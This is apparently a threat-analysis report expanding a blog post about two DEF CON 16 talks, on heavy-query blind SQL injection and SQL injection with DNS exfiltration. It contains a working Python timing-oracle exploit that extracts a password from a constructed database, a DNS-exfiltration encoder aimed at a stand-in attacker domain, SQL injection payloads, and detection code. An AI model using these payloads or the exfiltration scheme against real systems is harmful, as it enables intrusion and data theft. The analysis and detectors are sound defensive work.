Full Report
Some of the DC16 speaker summaries have been posted, and these two caught my eye: "Time-Based Blind SQL Injection using heavy queries" and "New Tool for SQL Injection with DNS Exfiltration". Both descriptions seem pretty much spot on with what we did in our DefCon talk last year... hmm... wonder if it's new twists on it, or a little more of the same? /mh
Analysis Summary
The post names two talks presented at DC16 but gives no technical detail about either, so the summary below is built from the talk titles and from general knowledge of the techniques they name. No malware samples, hashes or confirmed threat actors appear in the source.
The structured summary for the two techniques follows:
---
# Tool/Technique: Time-Based Blind SQL Injection using heavy queries
## Overview
A variant of time-based blind SQL injection in which the measurable delay is manufactured by a deliberately expensive query (typically a cartesian product of a table with itself) rather than by a built-in delay function. It targets the blind case, where the application returns neither query output nor an error, so the only signal the attacker receives is how long the response takes. Because it needs no `SLEEP()`-style function, it works on engines that lack one and in deployments where such functions are filtered.
## Technical Details
- Type: Technique
- Platform: Web applications backed by a SQL database. Any engine qualifies, but the heavy-query variant matters most where no delay function exists (Microsoft Access is the usual example) or where delay functions are blocked by a WAF or input filter.
- Capabilities: Inference of arbitrary query results (database enumeration and data extraction) one boolean or one character per request, by correlating response time with the truth of an injected condition. It is not by itself an authentication bypass.
- First Seen: The post says both topics match the authors' own DefCon talk of the previous year (DC15, 2007). Time-based blind SQL injection with delay functions was already well known before that; the heavy-query variant was being presented as new at DC16 (2008).
## MITRE ATT&CK Mapping
- TA0001 - Initial Access
- T1190 - Exploit Public-Facing Application (the injection itself)
- TA0006 - Credential Access: applies only when the extracted data includes credentials (password hashes in application tables, stored connection strings). T1003 (OS Credential Dumping) does not fit; nothing is dumped from the operating system.
- TA0010 - Exfiltration: the inferred data returns in-band through the application's own HTTP responses, so there is no separate channel to map; T1041 (Exfiltration Over C2 Channel) does not fit.
## Functionality
### Core Capabilities
- Injecting a condition whose truth controls whether an expensive expression is evaluated. Where a delay function is available (`WAITFOR DELAY` on SQL Server, `SLEEP()` or `BENCHMARK()` on MySQL, `pg_sleep()` on PostgreSQL) it plays the same role; the heavy-query variant substitutes a query the engine has to grind through.
- Using boolean logic (`CASE WHEN <condition> THEN <heavy query> ELSE 0 END`, or `AND`/`OR` short-circuit evaluation on engines that honour it) so that the heavy part runs only on the true branch: true condition = slow response, false condition = normal response.
- Sizing the heavy query so that the gap between the two outcomes dwarfs network jitter. Attackers calibrate by timing an always-true payload first and thresholding at a fraction of that, rather than relying on a fixed delay.
### Advanced Features
- The heavy query is usually a cross join of a table the attacker can always read, normally a system catalogue, with itself: `SELECT count(*) FROM sysusers A, sysusers B, sysusers C` on SQL Server, `all_users` on Oracle, `information_schema.columns` on MySQL. Each additional join multiplies the runtime, so the delay is tunable without any delay function; complex joins or full scans over large application tables serve the same purpose.
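Added example (not code from the post or from the DC16 speakers): a self-contained Python simulation of the technique against an in-memory SQLite database. SQLite has no `SLEEP()`, `WAITFOR` or `BENCHMARK()`, which is exactly the situation the heavy-query variant targets, so the delay is manufactured by a three-way self join of a padding table that the engine evaluates only on the true branch of a `CASE`. The `users` and `heavy` tables, the secret value and the vulnerable lookup are all constructed for the example; against a real engine the padding table would be a system catalogue such as `sysusers`.

```python
import sqlite3
import time

HEAVY_ROWS = 100   # 100^3 = 1M rows in the self join; raise it until a true branch takes ~0.1 s
SECRET = "S3c"     # constructed value the attacker cannot see directly


def build_db() -> sqlite3.Connection:
    """Constructed target: a users table holding the secret and a padding table for the join."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER, name TEXT, password TEXT)")
    con.execute("INSERT INTO users VALUES (1, 'admin', ?)", (SECRET,))
    con.execute("CREATE TABLE heavy (n INTEGER)")
    con.executemany("INSERT INTO heavy VALUES (?)", [(i,) for i in range(HEAVY_ROWS)])
    return con


def vulnerable_lookup(con: sqlite3.Connection, user_input: str) -> int:
    """The injectable query: user input concatenated into SQL. The caller only
    gets a row count back, never the data, so the injection is blind."""
    sql = f"SELECT count(*) FROM users WHERE name = '{user_input}'"
    return con.execute(sql).fetchone()[0]


# The heavy query: a cartesian product whose count is only computed when the
# CASE branch guarding it is reached (SQLite evaluates CASE branches lazily).
HEAVY = "(SELECT count(*) FROM heavy a, heavy b, heavy c)"


def response_time(con: sqlite3.Connection, payload: str) -> float:
    """Send one payload and return how long it took: the only signal we get."""
    t0 = time.perf_counter()
    vulnerable_lookup(con, payload)
    return time.perf_counter() - t0


def make_oracle(con: sqlite3.Connection):
    """Calibrate once against an always-true condition, then threshold at half
    that time. Calibration is what makes the inference robust to machine speed
    and jitter; a fixed 'more than one second' rule would not be."""
    heavy_time = response_time(con, f"x' OR (CASE WHEN 1=1 THEN {HEAVY} ELSE 0 END) > 0 --")
    threshold = heavy_time / 2

    def is_true(condition: str) -> bool:
        # condition is an SQL boolean expression evaluated inside the target database;
        # the trailing -- comments out the application's closing quote
        payload = f"x' OR (CASE WHEN ({condition}) THEN {HEAVY} ELSE 0 END) > 0 --"
        return response_time(con, payload) > threshold

    return is_true


def extract_string(is_true, expr: str, length: int) -> str:
    """Recover the value of `expr` (an SQL expression) one character at a time by
    binary search over printable ASCII: about 7 timed requests per character.
    The length is taken as known here; in practice it is inferred the same way."""
    out = []
    for pos in range(1, length + 1):
        lo, hi = 32, 126
        while lo < hi:
            mid = (lo + hi) // 2
            if is_true(f"unicode(substr({expr}, {pos}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        out.append(chr(lo))
    return "".join(out)


def demo() -> str:
    """Full run: build the target, calibrate, and read the admin password blind."""
    con = build_db()
    is_true = make_oracle(con)
    return extract_string(is_true, "(SELECT password FROM users WHERE id = 1)", len(SECRET))


if __name__ == "__main__":
    print(demo())
```

Running it prints `S3c` after roughly twenty timed requests. Note what the defender's WAF would see: no `sleep`, no `waitfor`, no `benchmark`, just a subquery wrapped in a `CASE`; the only things that give the attack away are the repetition and the bimodal timing.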
## Indicators of Compromise
- File Hashes: N/A (Technique, not specific malware)
- File Names: N/A
- Registry Keys: N/A
- Network Indicators: Long series of near-identical requests to one endpoint from one source, differing only in the value of a single parameter, whose response times fall into two clearly separated clusters.
- Host/Database Indicators: Database CPU or I/O spikes that line up with individual HTTP requests; slow-query logs filled with cross joins of system tables or other statements no application code would issue.
- Behavioral Indicators: Response times that track the injected condition rather than the requested resource.
## Associated Threat Actors
- Not specified in the context. The technique is generic web-application exploitation used by opportunistic attackers, targeted intruders and penetration testers alike.
## Detection Methods
- Signature-based detection: Monitoring for delay functions (`sleep()`, `pg_sleep()`, `WAITFOR DELAY`, `benchmark()`) in URL parameters or POST bodies catches the classic variant only; heavy-query payloads contain none of them. Extend signatures to self joins of system catalogues (`sysusers`, `all_users`, `information_schema`) and to `CASE`/`AND`/`OR` constructs wrapping a subquery inside user input.
- Behavioral detection: Correlating database CPU load or slow-query log entries with specific application requests, and flagging request series from one source to one endpoint whose response times are bimodal.
- YARA rules if available: N/A (technique, not a file artifact)
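The delay-function signatures above miss heavy queries by design, so the behavioural check is the one that matters. Added example (not from the page or the talk): a Python detector over constructed web-server access-log lines that flags a request series from one source to one endpoint in which exactly one parameter varies and the response times fall into two widely separated clusters, which is the shape of any timing oracle regardless of payload. The log format, hosts, endpoint names, payloads and timings are all constructed.

```python
import re
from collections import defaultdict
from statistics import median
from urllib.parse import parse_qsl, quote, urlsplit

# Constructed access-log format: <ts> <src> "<method> <url>" <status> <response_ms>
LOG_RE = re.compile(r'^(?P<ts>\S+) (?P<src>\S+) "(?P<method>[A-Z]+) (?P<url>\S+)" (?P<status>\d{3}) (?P<ms>\d+)$')


def parse(line: str):
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m["url"])
    return {"src": m["src"], "path": url.path,
            "params": dict(parse_qsl(url.query, keep_blank_values=True)), "ms": int(m["ms"])}


def bimodal(times, min_cluster=3, ratio=10.0):
    """Sort the response times and split at the largest multiplicative gap.
    Returns (fast_median, slow_median, gap_ratio) if both clusters have at least
    `min_cluster` members and the gap is at least `ratio`, else None. A uniformly
    slow endpoint has no such gap, so it is not mistaken for an oracle."""
    s = sorted(times)
    if len(s) < 2 * min_cluster:
        return None
    best_i, best_r = None, 1.0
    for i in range(min_cluster, len(s) - min_cluster + 1):
        r = s[i] / max(s[i - 1], 1)
        if r > best_r:
            best_i, best_r = i, r
    if best_i is None or best_r < ratio:
        return None
    return median(s[:best_i]), median(s[best_i:]), best_r


def detect(lines, min_requests=8):
    """Flag (source, endpoint) series where exactly one parameter varies and the
    response times are bimodal. Nothing here inspects the payload text, so heavy
    queries are caught exactly as SLEEP()-based probing is."""
    groups = defaultdict(list)
    for line in lines:
        rec = parse(line)
        if rec:
            groups[(rec["src"], rec["path"], tuple(sorted(rec["params"])))].append(rec)
    alerts = []
    for (src, path, names), recs in groups.items():
        if len(recs) < min_requests:
            continue
        varying = [n for n in names if len({r["params"][n] for r in recs}) > 1]
        split = bimodal([r["ms"] for r in recs])
        if split and len(varying) == 1:
            fast, slow, r = split
            alerts.append({"src": src, "path": path, "param": varying[0], "requests": len(recs),
                           "fast_ms": fast, "slow_ms": slow, "ratio": round(r, 1)})
    return alerts


PROBE_TRUTH = "1011001010011101010010110"   # constructed oracle answers for 25 probes


def constructed_log():
    """Constructed sample: normal browsing, a slow-but-steady report endpoint, and a
    heavy-query probing series against /item with two distinct timing clusters."""
    lines = []
    for i, ms in enumerate([14, 11, 17, 12, 15, 13, 16, 12, 14, 11], 1):
        lines.append(f'2008-08-08T10:00:{i:02d}Z 10.0.0.5 "GET /item?id={i}" 200 {ms}')
    for i, ms in enumerate([410, 395, 420, 405, 398, 415, 402, 409], 1):
        lines.append(f'2008-08-08T10:01:{i:02d}Z 10.0.0.7 "GET /report?month=2008-0{i}" 200 {ms}')
    for k, truth in enumerate(PROBE_TRUTH):
        cond = (f"1' AND (CASE WHEN ASCII(SUBSTRING((SELECT TOP 1 password FROM users),{k // 7 + 1},1))>{60 + k % 7} "
                f"THEN (SELECT count(*) FROM sysusers A,sysusers B,sysusers C) ELSE 0 END)>0--")
        ms = 340 + 3 * (k % 5) if truth == "1" else 12 + k % 4
        lines.append(f'2008-08-08T10:02:{k:02d}Z 203.0.113.9 "GET /item?id={quote(cond)}" 200 {ms}')
    return lines


if __name__ == "__main__":
    for alert in detect(constructed_log()):
        print(alert)
```

The `/report` series is there to show why a plain "slow request" rule is wrong: it is slower than every probe yet produces no alert, because its timings have no gap. In production the `ms` field comes from the reverse proxy or application log and the grouping window should be bounded in time.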
## Mitigation Strategies
- Prevention measures: Use prepared statements/parameterized queries wherever user input reaches a query, so injected text can never become SQL. This removes the whole class; once injection is impossible the delay mechanism is irrelevant.
- Hardening recommendations: Run the application with a least-privilege database account and, where the engine allows it, restrict visibility of system catalogues, which are the attacker's padding tables of choice. Set per-statement timeouts and resource limits so one request cannot monopolise the database; this limits the damage but does not close the leak, since "timed out" versus "answered" is still one bit. Treat WAF signatures as defence in depth only, because the heavy-query variant exists precisely to evade delay-function signatures.
## Related Tools/Techniques
- Classic Blind SQL Injection
- Error-based SQL Injection
***
# Tool/Technique: New Tool for SQL Injection with DNS Exfiltration
## Overview
A tool (as the talk title describes it) that exploits SQL injection and, instead of reading results back through the application, pushes them out by making the database server perform DNS lookups of hostnames that carry the data.
## Technical Details
- Type: Tool (implied by the title "New Tool")
- Platform: Web applications backed by a database engine that can be made to resolve a hostname from inside a query. The database host needs no direct internet access: a lookup sent to the internal recursive resolver is forwarded upstream and eventually reaches the authoritative server for the attacker's domain.
- Capabilities: Database data extraction, encoding of the extracted bytes into valid DNS labels, and out-of-band transport of those labels to an attacker-run name server.
- First Seen: Presented at DC16 (2008). DNS as an exfiltration channel was known earlier; the novelty claimed is a tool that drives it from SQL injection.
## MITRE ATT&CK Mapping
- TA0010 - Exfiltration
- T1048.003 - Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol (DNS)
- TA0001 - Initial Access
- T1190 - Exploit Public-Facing Application (the SQL injection that drives the lookups)
## Functionality
### Core Capabilities
- Using SQL injection to read the target data. Because the result leaves through DNS, the injection point need not return any output: a fully blind injection point works, provided the attacker can execute a statement that triggers a lookup.
- Triggering the lookup from inside the database with an engine-specific primitive that accepts a hostname or UNC path, for example `xp_dirtree` or `xp_fileexist` with `\\<host>\share` on SQL Server, `UTL_INADDR.GET_HOST_ADDRESS` or `UTL_HTTP.REQUEST` on Oracle, or `LOAD_FILE()` with a UNC path on MySQL running on Windows.
- Encoding the retrieved rows or fields into an alphabet legal in DNS labels (hexadecimal or base32; base64 is unsafe because DNS names are case-insensitive) and splitting them to respect the 63-octet label and 253-octet name limits.
- Building names in which the encoded data forms the leftmost labels and the attacker's own domain forms the suffix (e.g. `<encoded-chunk>.<sequence>.attacker.example`), so every query ends at the attacker's authoritative server. The suffix must be a domain the attacker controls, not the victim's, and every name should be unique, otherwise resolver caching answers repeats locally and they never reach the attacker.
- The database issues ordinary A (or AAAA) queries: the record type is whatever the engine's resolver library asks for, not something the attacker chooses from SQL. The attacker's server only needs to log the names it is asked about; what it answers, if anything, does not matter.
### Advanced Features
- Automating the whole loop (run the injected statement, split the result, issue one lookup per chunk, reassemble on the server) so that a multi-step manual process becomes one reusable tool function; sequence numbers and retries cope with lost or reordered lookups.
- Riding on DNS, which almost every network permits outbound (at least via an internal resolver) and which is scrutinised far less than HTTP. The lookups also originate from the database server rather than the web tier, a host from which outbound HTTP is often blocked outright.
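Added example, not the DC16 tool and not code from the post: the assembly and disassembly step in Python, i.e. how bytes read from the database become DNS names that the attacker's name server can reassemble. `x.example` stands in for an attacker-controlled domain and the sample rows are constructed; the engine-specific primitive that makes the database resolve each name (`xp_dirtree`, `UTL_INADDR` and so on) is not shown.

```python
import base64
import random
from typing import Optional

ATTACKER_DOMAIN = "x.example"   # constructed; would be a domain the attacker is authoritative for
MAX_LABEL = 63                  # RFC 1035: a label is at most 63 octets
MAX_NAME = 253                  # a full name is at most 253 octets in text form


def encode_names(data: bytes, session: str, domain: str = ATTACKER_DOMAIN) -> list[str]:
    """Pack `data` into as few DNS names as possible.

    base32 is used rather than base64 because resolvers may fold the case of a
    name; the first label carries <session>-<seq> so the receiver can reassemble
    out-of-order or retried queries, and a final <session>-end-<count> name tells
    it how many chunks to expect. The header also makes every name unique, which
    matters: a repeated name is answered from the resolver cache and never
    reaches the attacker's server.
    """
    enc = base64.b32encode(data).decode("ascii").rstrip("=").lower()
    names, pos, seq = [], 0, 0
    while pos < len(enc):
        header = f"{session}-{seq}"
        # octets left after the header, the dot before the domain, and the domain
        remaining = MAX_NAME - len(header) - 1 - len(domain)
        labels = []
        while pos < len(enc) and remaining >= 2:          # room for "." plus one char
            take = min(MAX_LABEL, remaining - 1, len(enc) - pos)
            labels.append(enc[pos:pos + take])
            pos += take
            remaining -= take + 1
        names.append(".".join([header, *labels, domain]))
        seq += 1
    names.append(f"{session}-end-{seq}.{domain}")
    return names


def decode_names(names: list[str], session: str, domain: str = ATTACKER_DOMAIN) -> Optional[bytes]:
    """Receiver side (the attacker's authoritative server): reassemble one session
    from the query names it was asked about, in any order. Returns None while
    chunks are still missing."""
    chunks, expected = {}, None
    suffix = "." + domain
    for name in names:
        if not name.endswith(suffix):
            continue                                      # unrelated lookup
        header, *data = name[:-len(suffix)].split(".")
        sess, _, rest = header.partition("-")
        if sess != session:
            continue
        if rest.startswith("end-"):
            expected = int(rest[4:])
        else:
            chunks[int(rest)] = "".join(data)
    if expected is None or any(i not in chunks for i in range(expected)):
        return None
    enc = "".join(chunks[i] for i in range(expected)).upper()
    enc += "=" * (-len(enc) % 8)                          # restore base32 padding
    return base64.b32decode(enc)


# Constructed sample of what an injected query might pull from a users table.
SAMPLE = b"".join(f"{i},user{i},hash{i:08x}\n".encode() for i in range(1, 9))


def round_trip(data: bytes = SAMPLE, session: str = "a7") -> Optional[bytes]:
    """Encode, deliver the names in shuffled order (DNS gives no ordering), decode."""
    names = encode_names(data, session)
    assert all(len(n) <= MAX_NAME for n in names)
    assert all(len(label) <= MAX_LABEL for n in names for label in n.split("."))
    arrived = names[:]
    random.Random(1).shuffle(arrived)
    return decode_names(arrived, session)


if __name__ == "__main__":
    for n in encode_names(SAMPLE, "a7"):
        print(n)
    print(round_trip() == SAMPLE)
```

The 168-byte sample fits in two data names plus the end marker, each name filled to the 253-octet limit; a real tool would also compress or encrypt the payload, but the two constraints shown here (case-insensitive alphabet, unique names) are the ones that break naive implementations in the field.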
## Indicators of Compromise
- File Hashes: N/A (Tool description only)
- File Names: N/A
- Registry Keys: N/A
- Network Indicators: Bursts of queries, visible at the internal resolver and at the egress point, for many distinct subdomains of one external domain, with long or high-entropy leftmost labels, originating from the database server (or from the web server if it hosts the database), a machine that normally resolves few or no external names. The client does not choose the upstream resolver, so "unusual external DNS resolvers" is not the indicator; the unusual element is the queried domain.
- Behavioral Indicators: A database statement of unusual shape (string aggregation, hex encoding, a call to a file-system or network procedure) followed immediately by a burst of lookups for a single external domain that no application component has any reason to resolve.
## Associated Threat Actors
- Not specified in the context. DNS tunnelling and exfiltration are used by a wide range of actors, from commodity malware to targeted intrusions, and by red teams.
## Detection Methods
- Signature-based detection: Flagging long labels, labels drawn from hex or base32 alphabets, and high-entropy leftmost labels in queries from application and database servers; flagging domains under which every name is seen exactly once.
- Behavioral detection: Counting distinct subdomains per (source host, queried domain) per minute and alerting on outliers; baselining which hosts ever resolve external names, so that a database server doing so at all stands out.
- YARA rules if available: N/A
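Added example (not from the page): the resolver-side check in Python, run over constructed query-log lines. It keys on (client, registered domain) and requires both a high count of distinct names and encoded-looking leftmost labels (long or high-entropy), so that a CDN producing many short unique names is not flagged while a database server emitting base32 labels under one external domain is. The log format, addresses and names are constructed; `registered_domain` is a two-label approximation that production code should replace with the public suffix list.

```python
import base64
import hashlib
import math
import re
from collections import Counter, defaultdict

# Constructed resolver log format: "<ts> client <ip> query: <name> IN <type>"
LINE_RE = re.compile(r"^(?P<ts>\S+) client (?P<client>[\d.]+) query: (?P<name>\S+) IN (?P<qtype>[A-Z]+)$")


def entropy(label: str) -> float:
    """Shannon entropy in bits per character; encoded data scores high, words low."""
    if not label:
        return 0.0
    n = len(label)
    return -sum(c / n * math.log2(c / n) for c in Counter(label).values())


def registered_domain(name: str) -> str:
    """Crude approximation (last two labels); use the public suffix list in production."""
    return ".".join(name.split(".")[-2:])


def detect_dns(lines, min_unique=10, long_label=40, high_entropy=3.5):
    """Group queries by (client, registered domain); alert when one client asks for
    many distinct names under one domain AND the leftmost labels look like encoded
    data. Volume alone is not enough: CDNs legitimately produce many unique names."""
    stats = defaultdict(lambda: {"names": set(), "max_label": 0, "entropies": []})
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        name = m["name"].rstrip(".").lower()
        first = name.split(".")[0]
        st = stats[(m["client"], registered_domain(name))]
        st["names"].add(name)
        st["max_label"] = max(st["max_label"], len(first))
        st["entropies"].append(entropy(first))
    alerts = []
    for (client, domain), st in stats.items():
        uniq = len(st["names"])
        if uniq < min_unique:
            continue
        mean_entropy = sum(st["entropies"]) / len(st["entropies"])
        if st["max_label"] >= long_label or mean_entropy >= high_entropy:
            alerts.append({"client": client, "domain": domain, "unique_names": uniq,
                           "max_label": st["max_label"], "mean_entropy": round(mean_entropy, 2)})
    return alerts


def constructed_dns_log():
    """Constructed sample: a workstation using a CDN (many short unique names), a
    database server resolving one internal name, then that server exfiltrating."""
    lines = []
    for i in range(1, 16):
        lines.append(f"2008-08-08T10:00:{i:02d}Z client 10.0.0.5 query: img{i}.cdn.example.net. IN A")
    lines.append("2008-08-08T10:00:20Z client 10.0.0.5 query: www.example.com. IN A")
    lines.append("2008-08-08T10:00:21Z client 10.0.0.5 query: mail.example.com. IN MX")
    lines.append("2008-08-08T10:01:00Z client 10.0.0.20 query: ldap.corp.internal. IN A")
    for i in range(12):
        # deterministic stand-in for a base32-encoded data chunk (52 characters)
        chunk = base64.b32encode(hashlib.sha256(f"chunk{i}".encode()).digest()).decode().lower()[:52]
        lines.append(f"2008-08-08T10:02:{i:02d}Z client 10.0.0.20 query: {chunk}.s1-{i}.x.example. IN A")
    return lines


if __name__ == "__main__":
    for alert in detect_dns(constructed_dns_log()):
        print(alert)
```

The thresholds are starting points: hex-encoded labels sit around 3.5 to 4 bits per character and base32 labels higher, while human-readable hostnames rarely exceed 3, but tune `long_label` and `high_entropy` against a week of your own resolver logs before alerting on them.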
## Mitigation Strategies
- Prevention measures: Fix the injection itself with parameterized queries. Then give database servers no route to the internet and point them at a resolver that forwards only an allowlist of zones (internal names, vendor update hosts). Merely using an internal resolver does not help on its own, because a recursive resolver forwards the lookup upstream on the database's behalf. Where the engine allows it, disable or revoke the procedures that perform lookups (`xp_dirtree`, `UTL_INADDR`, `UTL_HTTP` and the like) for the application's account.
- Hardening recommendations: Sinkhole known-bad domains; log queries at the resolver so that exfiltration is at least visible after the fact; rate-limit or block names with abnormally long labels, unusual alphabets or query types no internal client uses.
## Related Tools/Techniques
- SQL injection leading to OS command execution (the procedures that trigger lookups often sit alongside command-execution ones such as `xp_cmdshell`).
- Data exfiltration over other non-HTTP channels: ICMP, outbound SMB/UNC connections, or HTTP requests issued by the database itself.